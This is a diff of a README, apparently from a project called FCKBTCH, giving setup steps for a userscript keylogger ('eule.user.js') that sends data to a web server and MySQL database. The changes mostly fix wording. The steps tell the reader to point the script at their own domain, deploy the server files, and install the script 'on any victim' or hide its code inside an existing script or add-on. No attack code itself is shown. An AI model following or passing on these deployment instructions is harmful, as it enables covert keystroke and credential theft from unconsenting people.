fapkamaster/FCKBTCH/README.md

 First you have to change the domain, where the keylogger is located.
 In file "eule.user.js" in line 16.
-Then you copie the files on your webserver.
+Then you copy the files to your webserver.
+Don not forget to change the file "mysql_con.php" with your connection datas.
-After that you have to create the database.
+After that you have to create the database with the file "euleDatabase.sql".
-Now you can install the eule.user.js userscript on any victim or copy the code to an existing script/add-on.
+Now you can install the "eule.user.js" userscript on any victim or copy the code to an existing script/add-on.

 // DEUTSCH